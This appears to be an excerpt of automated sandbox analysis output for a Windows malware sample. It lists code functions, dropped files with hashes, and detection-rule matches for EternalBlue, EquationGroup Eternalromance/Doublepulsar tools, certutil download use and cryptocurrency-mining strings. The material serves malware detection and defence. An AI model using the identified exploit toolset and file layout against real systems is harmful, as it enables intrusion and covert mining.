Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0066DE6C 0_2_0066DE6C
Source: C:\ProgramData\SMB.exe Code function: 37_2_01335983 37_2_01335983
Source: C:\ProgramData\SMB.exe Code function: 37_2_013283EB 37_2_013283EB
Source: C:\ProgramData\SMB.exe Code function: 37_2_013231F0 37_2_013231F0
Source: C:\ProgramData\SMB.exe Code function: 37_2_0134001F 37_2_0134001F
Source: C:\ProgramData\SMB.exe Code function: 37_2_0132E097 37_2_0132E097
Source: C:\ProgramData\SMB.exe Code function: 37_2_013330E5 37_2_013330E5
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133E8EC 37_2_0133E8EC
Source: C:\ProgramData\SMB.exe Code function: 37_2_0134E8D4 37_2_0134E8D4
Source: C:\ProgramData\SMB.exe Code function: 37_2_01332B39 37_2_01332B39
Source: C:\ProgramData\SMB.exe Code function: 37_2_01342B68 37_2_01342B68
Source: C:\ProgramData\SMB.exe Code function: 37_2_0134A350 37_2_0134A350
Source: C:\ProgramData\SMB.exe Code function: 37_2_013363F1 37_2_013363F1
Source: C:\ProgramData\SMB.exe Code function: 37_2_0132D222 37_2_0132D222
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133F200 37_2_0133F200
Source: C:\ProgramData\SMB.exe Code function: 37_2_0132BA6A 37_2_0132BA6A
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133FA6A 37_2_0133FA6A
Source: C:\ProgramData\SMB.exe Code function: 37_2_01332DB4 37_2_01332DB4
Source: C:\ProgramData\SMB.exe Code function: 37_2_01335DB8 37_2_01335DB8
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133EDE8 37_2_0133EDE8
Source: C:\ProgramData\SMB.exe Code function: 37_2_0132DC32 37_2_0132DC32
Source: C:\ProgramData\SMB.exe Code function: 37_2_0132ECE9 37_2_0132ECE9
Source: C:\ProgramData\SMB.exe Code function: 37_2_01322759 37_2_01322759
Source: C:\ProgramData\SMB.exe Code function: 37_2_01334FB4 37_2_01334FB4
Source: C:\ProgramData\SMB.exe Code function: 37_2_01323F95 37_2_01323F95
Source: C:\ProgramData\SMB.exe Code function: 37_2_0132D634 37_2_0132D634
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133F635 37_2_0133F635
Source: C:\ProgramData\SMB.exe Code function: 37_2_01349EA0 37_2_01349EA0
Source: C:\ProgramData\SMB.exe Code function: 37_2_01325E83 37_2_01325E83
Source: SMB.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SMB.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\ProgramData\SMB.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\ProgramData\SMB.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\ProgramData\SMB.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\ProgramData\SMB.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\ProgramData\SMB.exe Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\ProgramData\SMB.exe Section loaded: dxgidebug.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll
Source: Joe Sandbox View Dropped File: C:\ProgramData\SMB.exe 5214F356F2E8640230E93A95633CD73945C38027B23E76BB5E617C71949F8994
Source: Joe Sandbox View Dropped File: C:\ProgramData\adfw-2.dll F06D02359666B763E189402B7FBF9DFA83BA6F4DA2E7D037B3F9AEBEFD2D5A45
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, type: SAMPLE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 0.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 11.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 66.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 11.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 36.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 66.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 65.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 65.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 36.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 0.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000000.00000000.246558745.000000000075C000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000024.00000000.282923064.000000000075C000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000000.00000002.337792193.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000002.340838407.00000000042CD000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000000.00000002.340838407.00000000042CD000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000000B.00000000.261351835.000000000075C000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000042.00000000.306856950.000000000075C000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000000.00000002.336175493.0000000000769000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000002.336175493.0000000000769000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000024.00000002.284640590.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000024.00000002.284640590.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000024.00000002.284640590.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 0000000B.00000000.261054855.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 0000000B.00000000.261054855.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 0000000B.00000000.261054855.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000000.00000000.246392472.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000000.246392472.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000000.00000000.246392472.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000041.00000000.301932792.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000041.00000000.301932792.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000041.00000000.301932792.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000000.00000002.336119364.000000000075C000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000042.00000000.306247565.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000042.00000000.306247565.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000042.00000000.306247565.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000042.00000002.335911830.000000000075C000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000024.00000000.282865261.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000024.00000000.282865261.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000024.00000000.282865261.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000041.00000000.302006750.000000000075C000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 0000000B.00000002.271375343.000000000075C000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000000.00000002.338831171.00000000031CE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000000.00000002.338831171.00000000031CE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 00000000.00000002.335862211.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000002.335862211.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000000.00000002.335862211.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000042.00000002.335587217.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000042.00000002.335587217.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000042.00000002.335587217.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000041.00000002.307534563.000000000075C000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 0000000B.00000002.271006999.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 0000000B.00000002.271006999.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 0000000B.00000002.271006999.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: 00000024.00000002.285729583.000000000075C000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000041.00000002.307114937.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000041.00000002.307114937.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: 00000041.00000002.307114937.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 2480, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 2480, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 2480, type: MEMORYSTR Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4140, type: MEMORYSTR Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4140, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4140, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4140, type: MEMORYSTR Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6760, type: MEMORYSTR Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6760, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6760, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6760, type: MEMORYSTR Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6612, type: MEMORYSTR Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6612, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6612, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6612, type: MEMORYSTR Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4204, type: MEMORYSTR Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4204, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4204, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4204, type: MEMORYSTR Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: C:\ProgramData\coli-0.dll, type: DROPPED Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: C:\ProgramData\svchostromance.exe, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Doublepulsar_1_3_1 date = 2017-04-15, hash1 = 15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\ProgramData\svchostromance.exe, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Eternalromance_2 date = 2017-04-15, hash3 = 92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34, hash2 = b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d
Source: C:\ProgramData\svchostromance.exe, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Eternalromance date = 2017-04-15, hash2 = b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d
Source: C:\ProgramData\svchostromance.exe, type: DROPPED Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: C:\ProgramData\svchostlong.xml, type: DROPPED Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: C:\ProgramData\svchostromance.xml, type: DROPPED Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: C:\ProgramData\etchCore-0.x64.dll, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Architouch_Eternalsynergy_Smbtouch date = 2017-04-15, hash3 = 108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a, hash2 = 92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc
Source: C:\ProgramData\svchostlong.exe, type: DROPPED Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: C:\ProgramData\etchCore-0.x86.dll, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Architouch_Eternalsynergy_Smbtouch date = 2017-04-15, hash3 = 108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a, hash2 = 92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc
Source: C:\ProgramData\zibe.dll, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Architouch_Eternalsynergy_Smbtouch date = 2017-04-15, hash3 = 108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a, hash2 = 92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc
